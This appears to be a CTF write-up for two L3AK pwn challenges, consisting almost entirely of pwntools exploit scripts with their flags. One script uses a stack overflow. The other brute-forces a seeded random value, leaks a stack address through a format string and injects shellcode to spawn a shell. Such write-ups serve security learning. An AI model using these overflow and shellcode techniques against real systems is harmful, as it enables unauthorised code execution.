safe gets
Cool challenge
#!/usr/bin/env python3
from pwn import *
elf = ELF("./chall_patched")
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hl', '130']
#context.log_level = "debug"
gs = '''
b main
continue
'''
def start():
if args.REMOTE:
return remote("34.45.81.67", 16002)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
r = start()
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
if (d2):
return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value
#========= exploit here ===================
def rstring(s: str) -> str:
return s[::-1]
jaja = "💀"
payload = "A"*0x28
payload += (p64(0x6a12400000000000)).decode('latin1')
payload += "C"*0x10
payload += "\x00"*8
payload += jaja*0x40
print(len(payload))
log.info(f"payload len() = {len(payload)}")
sl((rstring(payload)))
#L3AK{6375_15_4pp4r3n7ly_n3v3r_54f3}
#========= interactive ====================
r.interactive()
The goose
Very creative challenge :)
#!/usr/bin/env python3
from pwn import *
import time
import random
elf = ELF("./chall_patched", checksec=False)
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''
def start():
if args.REMOTE:
return remote("34.45.81.67", 16004)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
#r = start()
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
if (d2):
return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value
#========= exploit here ===================
while True:
ts = int(time.time())
nhonks_list = []
c = 0
for delta in range(-40, 41):
random.seed(ts + delta)
nhonks = random.randint(10, 100)
nhonks_list.append(nhonks)
for nhonks in nhonks_list:
r = start() # reconecta cada vez
#r.timeout = 1
sla(b"> ",b"AAAAAAAA")
sla(b"honks?", bc(nhonks))
try:
c += 1
log.info(f"Try #{c}")
res = r.recv(timeout=1)
if b"wow" in res or b"what's your name again?" in res or b"leave to the world?" in res:
log.success(f"Encontrado nhonks = {nhonks}")
payload = b"%p-"*12
payload += b"%p"
sl(payload)
leak = int(rcu(b"wow ","-"),16)
logleak(f"stack leak", leak)
payload = b"A"*0x178
payload += p64(leak+0x60) #to land in the stack
payload += b"\x90"*0x20
payload += asm(shellcraft.sh())
sla(b"to the world?", payload)
r.interactive()
exit(0)
except EOFError:
r.close()
continue
except Exception:
r.close()
time.sleep(1)
#========= interactive ====================
r.interactive()
#L3AK{H0nk_m3_t0_th3_3nd_0f_l0v3}